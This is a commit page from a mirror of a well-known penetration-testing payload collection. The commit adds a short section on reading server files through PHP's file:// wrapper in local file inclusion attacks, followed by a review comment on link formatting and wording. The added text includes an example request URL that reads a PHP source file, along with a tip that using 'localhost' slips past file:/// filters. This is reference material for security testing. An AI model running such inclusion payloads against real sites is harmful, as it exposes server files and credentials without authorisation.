mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-24 14:16:22 +02:00
n3rada 2024-04-22 15:11:34 +02:00 committed by GitHub
commit 52ee755ff2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -151,6 +151,14 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
## LFI / RFI using wrappers
### Wrapper file://
It is possible to use the [`file://`]([url](https://www.php.net/manual/en/wrappers.file.php)) wrapper in order to read file inside allowed paths (if `open_basedir` restriction in effect).
```shell
http://example.com/index.php?filename=file://localhost/var/www/html/secured_extranet/panel/security.php
```
Note that using `localhost` above bypasses `file:///` filtering.
### Wrapper php://filter
The part "`php://filter`" is case insensitive
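Review bot: the link in the added `file://` paragraph is malformed. `[`file://`]([url](https://www.php.net/manual/en/wrappers.file.php))` still carries a leftover `[url](...)` placeholder inside the link target, so it will not render as a link; it should be `[`file://`](https://www.php.net/manual/en/wrappers.file.php)`. In the same sentence, "read file inside allowed paths (if `open_basedir` restriction in effect)" is missing words; suggest "read files inside the allowed paths (when an `open_basedir` restriction is in effect)". The closing note "using `localhost` above bypasses `file:///` filtering" does not say what filter is meant; one clause stating that it refers to a check matching the literal `file:///` prefix would make the point clear to readers writing or reviewing such a filter. Minor: the fence is tagged `shell` but contains a URL, not a command.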